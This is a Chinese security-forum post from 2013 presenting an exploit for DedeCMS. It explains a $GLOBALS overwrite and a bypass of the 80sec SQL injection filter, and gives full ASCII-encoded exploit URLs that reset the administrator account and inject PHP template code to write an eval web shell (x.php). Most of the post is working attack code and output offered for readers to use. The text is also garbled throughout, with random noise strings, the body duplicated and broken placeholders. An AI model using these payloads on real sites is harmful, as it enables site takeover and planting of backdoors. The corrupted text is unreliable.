找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2728|回复: 0
打印 上一主题 下一主题

dedecms最新版本修改任意管理员漏洞+getshell+exp

[复制链接]
跳转到指定楼层
楼主
发表于 2013-9-21 16:08:21 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此漏洞无视gpc转义,过80sec注入防御。
6 `- j4 e0 N8 [+ u9 a补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?4 _9 R( k# j7 \+ I. j! x
起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。7 b8 o. S* S+ ]  f. ~4 [5 i0 E8 \8 E
include/dedesql.class.php
' Q( q" x8 t& W$ v9 Iif(isset($GLOBALS['arrs1'])){    $v1 = $v2 = '';    for($i=0;isset($arrs1[$i]);$i++)    {        $v1 .= chr($arrs1[$i]);    }    for($i=0;isset($arrs2[$i]);$i++)    {        $v2 .= chr($arrs2[$i]);   //解码ascii    }    $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql)    {        $prefix="#@__";        $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql);  //看到这里无话可说,不明白为什么要这样做。        $this->queryString = $sql;    }另外说下绕过80sec防注入的方法。
3 m; O" c# I4 j9 h" {8 `/ e同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
  j- S! l9 R, I1 n而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。
% E6 g" t0 N% x: N0 qplus/download.php* o4 P, v9 T% U8 a: R- \! G' p
else if($open==1){    $id = isset($id) && is_numeric($id) ? $id : 0;    $link = base64_decode(urldecode($link));    $hash = md5($link);//这里的#@_是可以控制的    $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' ");    if($rs <= 0)     {         $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); ";         $dsql->ExecNoneQuery($query);    }    header("locationlink");    exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):3 F$ l* f( x5 g
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
! k/ X: `3 m' D4 ^: IUPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:
$ k, ?9 C) b! a1 a3 g$ M5 yhttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
; Q4 c4 q4 v+ B! v( p+ N. e/ s漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
( K  S3 {! u8 P$ t! T3 n如果找不到后台,参见以前修改数据库直接拿SHELL的方法' B8 {7 \; ?# H  ?  p
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(此漏洞无视gpc转义,过80sec注入防御。
6 ]) U# C# K3 V! t$ a补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?
) I0 C( b" O( g- A7 w起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
7 S: K- z! B) L8 @5 tinclude/dedesql.class.php
( U: j) ]8 N* J- ^2 Lif(isset($GLOBALS['arrs1'])){    $v1 = $v2 = '';    for($i=0;isset($arrs1[$i]);$i++)    {        $v1 .= chr($arrs1[$i]);    }    for($i=0;isset($arrs2[$i]);$i++)    {        $v2 .= chr($arrs2[$i]);   //解码ascii    }    $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql)    {        $prefix="#@__";        $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql);  //看到这里无话可说,不明白为什么要这样做。        $this->queryString = $sql;    }另外说下绕过80sec防注入的方法。* T2 z$ W) R. L% W4 J! ^
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2* N0 _$ |3 I9 {9 G* j# r6 N  j
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。0 T. j+ Y* C8 y0 G! a
plus/download.php
* `; \9 @) ]9 J* g% x, telse if($open==1){    $id = isset($id) && is_numeric($id) ? $id : 0;    $link = base64_decode(urldecode($link));    $hash = md5($link);//这里的#@_是可以控制的    $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' ");    if($rs <= 0)     {         $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); ";         $dsql->ExecNoneQuery($query);    }    header("locationlink");    exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):: A/ P$ ]* j5 }5 J5 e) C. {. D2 }
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:& ~* B) u$ ~* B& O1 J
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:
  x1 r1 ]7 _. n0 ?http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
! X' ?: T( E# T% r$ X6 Z7 i5 H漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
, `4 W8 \7 d6 A0 J* B9 O7 P如果找不到后台,参见以前修改数据库直接拿SHELL的方法# M2 M% W+ w/ i7 {8 o
___FCKpd___6getshell:
- x! C4 ^! C1 J# Xhttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35会在plus目录生成 x.php 密码 m  r% X5 ^) q9 |1 U# G4 M
http://127.0.0.1/plus/x.php6 I% B" L- [8 H
update成功后还要访问下 /plus/mytag_js.php?aid=1
0 ~; ^: k: k- L& d# p0 t6 D失败原因:
! _2 O4 @  J/ @6 z8 g测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
$ b0 w% w* L( C, z: l# h1 {$ ~配图:+ X  \( W# H6 t6 M$ y7 Q% I8 O4 r
1.查看dede当前版本
. |/ g# U5 C4 M# E0 v9 @& ]
+ I  t9 W' i) g1 B1 Z6 D6 {' [6 h2.执行exp
- }8 F4 D. x7 S8 L! K8 U# y& n, n& o: h0 k2 L) L& P% \
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台
, T: |8 W! y4 h* x5 O8 M# t
; {& X' z) E0 e  ospider密码admin3 K* ~4 K. t' D) M7 W
' G& Z" p1 N+ a# s
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png
4 N% G  K$ G' O( k7 Q8 A8 N: N原作者:imspider& X- R- d+ g; K; ^. H
  H/ q4 b, R% u: s# D4 q4 t  R1 Y4 M
本博客测试+配图+getshell
; S5 j# P3 C$ @; \! E: P+ xPOST[spider]);?-->'');{/dede:php}' WHERE `aid` =1 LIMIT
2 P5 p+ J7 E: u) a  L
( |4 _: K) J/ u$ G4 ~( K/ Lgetshell:& |- ^$ _% L, v: S
___FCKpd___7会在plus目录生成 x.php 密码 m, j/ f" S& o8 r6 u: X% M3 r
http://127.0.0.1/plus/x.php
+ U  o4 x0 t; |$ K! H9 ?9 ^! B% ]update成功后还要访问下 /plus/mytag_js.php?aid=1; O2 D; U0 d# |& E8 l
失败原因:# ], o" f/ ~2 t: n0 R/ y/ s+ t
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
9 \8 f# M" K) J7 Y0 V6 d配图:% E  a  }5 H7 W9 N3 a, E
1.查看dede当前版本
- c2 z/ c% U" T% g6 uhttp://www.myhack58.com/Article/UploadPic/2013-9/20139913326739.png
& j2 r- {. d! z  i2 o, [0 I2.执行exp' G0 b) G8 i- I7 R1 Y/ Q  _& h% o
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台
# c8 @$ ?. L- o& k) Z+ n: K: |spider密码admin
3 O$ v& Z% \2 M; [http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png
5 O/ a; t6 c3 c& ~/ K  s 2 l: ^) {) Z3 G% v. |& B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表